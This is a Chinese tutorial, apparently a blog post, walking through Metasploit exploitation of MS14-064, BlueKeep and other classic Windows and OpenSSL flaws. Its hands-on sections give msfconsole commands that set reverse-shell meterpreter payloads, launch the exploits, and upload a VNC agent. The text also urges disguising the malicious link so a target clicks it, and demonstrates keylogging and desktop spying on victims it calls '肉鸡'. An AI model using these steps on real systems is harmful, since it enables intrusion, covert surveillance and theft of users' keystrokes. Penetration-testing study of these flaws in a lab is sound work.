Metasploit 经典漏洞复现
Metasploit 经典漏洞复现
本章内容概括:
-
1.1 MS14-064(OLE 远程代码执行)漏洞
-
1.2 MS17-010(永恒之蓝)漏洞
-
1.3 CVE 漏洞的产生
-
1.4 CVE-2014-0160(心脏滴血)漏洞
-
1.5 CVE-2018-8174 (0day 双杀)漏洞
-
1.6 CVE-2019-0708 进行渗透
1.1 MS14-064(OLE 远程代码执行)漏洞
思考:突然某人给你电脑或者手机发了个链接,你敢点开吗?
学完这节课就大家就会明白,只要点开恶意链接,你就会中招。
1.1.1 MS14-064 简介
Microsoft Windows OLE 远程代码执行漏洞,OLE(对象链接与嵌入)是一种 允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响 Win95+IE3 – Win10+IE11 全版本...
1.1.2 实战
Metasploit 中此漏洞的利用模块是
exploit/windows/browser/ms14_064_ole_code_execution
接下来就开始实战:
root@kali:~# msfconsole
查找 ms14-064 漏洞模块:
msf5 > search ms14-064
调用并设置:
msf5 > use exploit/windows/browser/ms14_064_ole_code_execution
查看选项:
msf5 exploit(ms14_064_ole_code_execution) > show options
设置允许调用 powershell:
msf5 exploit(ms14_064_ole_code_execution) > set AllowPowershellPrompt true
设置本机 IP:
msf5 exploit(ms14_064_ole_code_execution) > set srvhost 192.168.253.128
调用并设置 payload:
调用 payload:
msf exploit(ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
查看选项:
msf exploit(ms14_064_ole_code_execution) > show options
设置监听 IP:
msf exploit(ms14_064_ole_code_execution) > set lhost 192.168.253.132
设置监听端口:
msf exploit(ms14_064_ole_code_execution) > set lport 4444
发现这个模块默认是针对 xp 系统,我们要设置它的目标支持 win7:
msf5 msf5 exploit(windows/browser/ms14_064_ole_code_execution) > set target 1
开始攻击:
运行 msf exploit(ms14_064_ole_code_execution) > run(或 exploit)
在本机开启 Web 服务,并生成攻击 URL
把生成的链接可以伪装成他们感兴趣的链接,发给你的目标电脑,他只要点开,我们就获得了他的管理员全权限
可以进一步测试一下 meterpreter 命令:help 一下可以看到很多可以进一步测试的命令,上两节已经讲 了大部分的 meterpreter 命令;
我们这边就演示一下: run vnc:
可以监控肉鸡的桌面 键盘记录可以演示一下:
Keyscan_start Keyscan_dump Keyscan_stop
1.2 MS17-010(永恒之蓝)漏洞
1.2.1永恒之蓝漏洞简介
永恒之蓝是指 2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻 击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高 权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧 洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复 文件。
永恒之蓝漏洞的影响范围:
目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、 Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、 Windows Server 2012
1.2.2 实战
1.3 CVE 的诞生
CVE 的英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。CVE 就好像是一个查看公共漏洞的字典。
随着全球范围的黑客入侵不断猖獗,信息安全问题越来越严重。在对抗黑客入侵的安全技术中,实时入侵检测和漏洞扫描评估(IDnA——Intrusion Detection and Assessment)的技术和产品已经开始 占据越来越重要的位置。
Intrusion Detection and Assessment #入侵检测与评估
各个 IDnA 厂家在阐述自己产品的水平时,都会声称自己的扫描漏洞数最多,你说有 1000 种,我说 有 5000。我们的用户如何辨别?不同的厂家在入侵手法和漏洞这方面的知识库各有千秋,用户如何最大 限度地获得所有安全信息?CVE 就是在这样的环境下应运而生的。
Cve 就相当于字典一样,可以去查看所有已经发生的漏洞。
1.4 CVE-2014-0160(心脏滴血)漏洞
漏洞成因:
Heartbleed 漏洞是由于未能在 memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪 OpenSSL 所分配的 64KB 缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次 64KB 的速度进行泄露。
漏洞危害:
如同漏洞成因所讲,我们可以通过该漏洞读取每次攻击泄露出来的信息,所以可能也可以获取到服务 器的私钥,用户 cookie 和密码等。
影响平台:OpenSSL 1.0.1~1.0.1f 版本、OpenSSL 1.0.2-beta~1.0.2-beta1 版本
首先介绍一个实验环境:bee-box,这是我们这个漏洞要用的一个实验环境;
简介:Bee-box 官方称呼 BWAPP,buggy web Application 这是一个集成了各种常见漏洞和最 新漏洞的开源 Web 应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含 了超过 100 种漏洞,涵盖了所有主要的已知 Web 漏洞,包括 OWASPTop10 安全风险,最重要的是已经 包含了 OpenSSL 和 ShellShock 漏洞。
1.5 CVE-2018-8174 (0day 双杀)漏洞
漏洞介绍: 该漏洞影响最新版本的 IE 浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在 4 月 20 日早上确认此漏洞,并于 5 月 8 号 发布了官方安全补丁,对该 0day 漏洞进行了修复,并将其命名为 CVE-2018-817
1.6 CVE-2019-0708 漏洞
当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。
查找 2019-0708 漏洞模块: msf5 > search cve:cve-2019-0708 调用并设置 exploit: msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhost 192.168.253.133 rhost => 192.168.1.106 调用并设置 payload: msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.253.128 lhost => 192.168.1.102 选择攻击目标类型: msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 5 target => 5 开始攻击: 运行 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run #运行 拿到 shell 权限后进行远程监控 meterpreter > run vnc [*] Creating a VNC reverse tcp stager: LHOST=192.168.1.102 LPORT=4545 [*] Running payload handler [*] VNC stager executable 73802 bytes long [*] Uploaded the VNC agent to C:\Windows\TEMP\EBfsCNzizxKpY.exe (must be deleted manually) [*] Executing the VNC agent with endpoint 192.168.1.102:4545... Connected to RFB server, using
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 零经验选手,Compose 一天开发一款小游戏!
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!